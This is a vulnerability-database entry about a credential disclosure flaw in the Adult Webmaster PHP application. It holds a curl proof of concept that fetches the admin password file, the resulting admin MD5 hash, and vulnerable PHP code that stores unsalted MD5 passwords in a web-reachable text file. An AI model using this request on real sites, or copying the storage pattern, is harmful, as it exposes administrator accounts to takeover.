header-logo
Suggest Exploit
vendor:
PHP
by:
vinicius777
7,5
CVSS
HIGH
Administrative Credential Disclosure
200
CWE
Product Name: PHP
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Adult Webmaster PHP – Password Disclosure

The Adult Webmaster PHP application is vulnerable to an administrative credential disclosure vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This will allow the attacker to view the contents of the userpwdadfasdfre.txt file, which contains the administrative credentials in plaintext.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of the application.
Source

Exploit-DB raw data:

##########################################################################
[+] Exploit:Adult Webmaster PHP - Password Disclosure                    #
[+] Author: vinicius777					                 #
[+] Email/Twitter: vinicius777 [AT] gmail  @vinicius777_                 #	                 
[+] Vendor Homepage: http://sourceforge.net/projects/adultweb/  	 #
##########################################################################

 
[1] Administrative Credential Disclosure

PoC: 

root@kali:/# curl http://localhost/home/caspers/public_html/demo/admin/userpwdadfasdfre.txt

admin:3a4ebf16a4795ad258e5408bae7be341

#

Vulnerable Code:
[+] admin/common.php

        // Check user existance 
        $pfile = fopen("userpwdadfasdfre.txt","a+");
    rewind($pfile);

    while (!feof($pfile)) {
        $line = fgets($pfile);
        $tmp = explode(':', $line);
        if ($tmp[0] == $user) {
            $errorText = "The selected user name is taken!";
            break;
        }
    }

    // If everything is OK -> store user data
    if ($errorText == ''){
                // Secure password string
                $userpass = md5($pass1);

                fwrite($pfile, "\r\n$user:$userpass");
    }

    fclose($pfile);
 

#
#
# Greetz to g0tm1lk and TheColonial.

Navigation

Suggest Exploit

Services By CQR